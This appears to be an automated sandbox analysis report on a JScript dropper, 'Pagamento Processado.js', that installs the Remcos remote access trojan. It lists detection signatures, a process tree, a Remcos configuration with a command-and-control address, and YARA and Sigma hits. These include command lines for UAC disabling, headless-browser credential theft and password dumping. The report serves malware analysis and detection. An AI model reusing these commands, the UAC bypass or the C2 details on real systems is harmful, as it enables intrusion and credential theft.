Edit tour

Windows Analysis Report
Pagamento Processado.js

Overview

General Information

Sample name:	Pagamento Processado.js
Analysis ID:	1638815
MD5:	c779c1a6a44074d8694efcd617c2e3d5
SHA1:	6aac8ee4f10f0d5382182797a17dc1a11e2dacd5
SHA256:	39b2ef800082b7d2396f913fb5ccc1d6268bc8fc052aaeba9640c19a6eec788a
Tags:	jsRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Found evasive API chain checking for user administrative privileges

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

JavaScript source code contains functionality to generate code involving a shell, file or stream

Maps a DLL or memory area into another process

PE file contains section with special chars

PE file has nameless sections

Potential obfuscated javascript found

Powershell drops PE file

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected WebBrowserPassView password recovery tool

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Execution In Headless Mode

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6216 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pagamento Processado.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 7336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 7460 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: 83AD102EBF7A8FF7859C781C0DF45BE8)

JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 7564 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: 83AD102EBF7A8FF7859C781C0DF45BE8)

chrome.exe (PID: 7684 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7992 cmdline: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --no-pre-read-main-dll --field-trial-handle=2068,i,10874666967590452469,2224900250606111256,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

recover.exe (PID: 7744 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ufrigxexiotsicyjmedmitblhoqmmy" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ehwagppqwwlwtqmnwopflynbivhvfjnzk" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 7768 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pcjthi" MD5: D38B657A068016768CA9F3B5E100B472)

msedge.exe (PID: 4924 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 8100 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2132 --field-trial-handle=1572,i,5104455906519316198,7108619280464206914,262144 --disable-features=PaintHolding /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["196.251.69.63:2721:1"], "Assigned name": "Brazil", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-U6XQL5", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x89b94:$a1: Remcos restarted by watchdog! 0x8a2bc:$a3: %02i:%02i:%02i:%03i

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2523575481.0000000003FC0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000B.00000002.2518531242.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c328:$a1: Remcos restarted by watchdog! 0xe5b68:$a1: Remcos restarted by watchdog! 0x6c978:$a3: %02i:%02i:%02i:%03i 0xe61b8:$a3: %02i:%02i:%02i:%03i
0000000B.00000002.2518531242.0000000000B48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x5c2e8:$a1: Remcos restarted by watchdog! 0x5c938:$a3: %02i:%02i:%02i:%03i
0000000D.00000002.1476360497.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x71656:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
Process Memory Space: powershell.exe PID: 7336	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1e0d09:$b1: ::WriteAllBytes( 0x1e0d32:$b2: ::FromBase64String( 0x2aab6:$s1: -join 0x37b8b:$s1: -join 0x3af5d:$s1: -join 0x3b60f:$s1: -join 0x3d100:$s1: -join 0x3f306:$s1: -join 0x3fb2d:$s1: -join 0x4039d:$s1: -join 0x40ad8:$s1: -join 0x40b0a:$s1: -join 0x40b52:$s1: -join 0x40b71:$s1: -join 0x413c1:$s1: -join 0x4153d:$s1: -join 0x415b5:$s1: -join 0x41648:$s1: -join 0x418ae:$s1: -join 0x43a44:$s1: -join 0x5248e:$s1: -join
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x2892e:$a1: Remcos restarted by watchdog! 0x39146:$a1: Remcos restarted by watchdog! 0x28f83:$a3: %02i:%02i:%02i:%03i 0x293c0:$a3: %02i:%02i:%02i:%03i 0x3979b:$a3: %02i:%02i:%02i:%03i 0x39bd8:$a3: %02i:%02i:%02i:%03i
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x37e22:$a1: Remcos restarted by watchdog! 0x38477:$a3: %02i:%02i:%02i:%03i 0x388b4:$a3: %02i:%02i:%02i:%03i
Process Memory Space: recover.exe PID: 7744	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3fc0000.2.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.2.recover.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.2.recover.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3fc0000.2.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x71656:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a358:$a1: Remcos restarted by watchdog! 0x6a9a8:$a3: %02i:%02i:%02i:%03i
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x645f4:$str_a1: C:\Windows\System32\cmd.exe 0x64570:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64570:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x650d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64664:$str_b2: Executing file: 0x6549c:$str_b3: GetDirectListeningPort 0x64ec8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65048:$str_b7: \update.vbs 0x6468c:$str_b9: Downloaded file: 0x64678:$str_b10: Downloading file: 0x6471c:$str_b12: Failed to upload file: 0x65464:$str_b13: StartForward 0x65484:$str_b14: StopForward 0x64fa0:$str_b15: fso.DeleteFile " 0x64f34:$str_b16: On Error Resume Next 0x64fd0:$str_b17: fso.DeleteFolder " 0x6470c:$str_b18: Uploaded file: 0x646cc:$str_b19: Unable to delete: 0x64f68:$str_b20: while fso.FileExists(" 0x64ba9:$str_c0: [Firefox StoredLogins not found]
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x644e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64478:$s1: CoGetObject 0x6448c:$s1: CoGetObject 0x644a8:$s1: CoGetObject 0x6e256:$s1: CoGetObject 0x64438:$s2: Elevation:Administrator!new:
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0xe5598:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i 0xe5be8:$a3: %02i:%02i:%02i:%03i
9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0xdf728:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0xdf6b8:$s1: CoGetObject 0xdf6cc:$s1: CoGetObject 0xdf6e8:$s1: CoGetObject 0xe9496:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new: 0xdf678:$s2: Elevation:Administrator!new:
Click to see the 22 entries

Sigma Signatures

System Summary

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe", ParentImage: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe, ParentProcessId: 7564, ParentProcessName: JXCJKXCJHKJHXCJHKXCXCJHK.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7684, ProcessName: chrome.exe

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6216, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49695

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pagamento Processado.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pagamento Processado.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pagamento Processado.js", ProcessId: 6216, ProcessName: wscript.exe

Sigma detected: Browser Execution In Headless Mode

Source: Process started

Sigma detected: Browser Started with Remote Debugging

Source: Process started

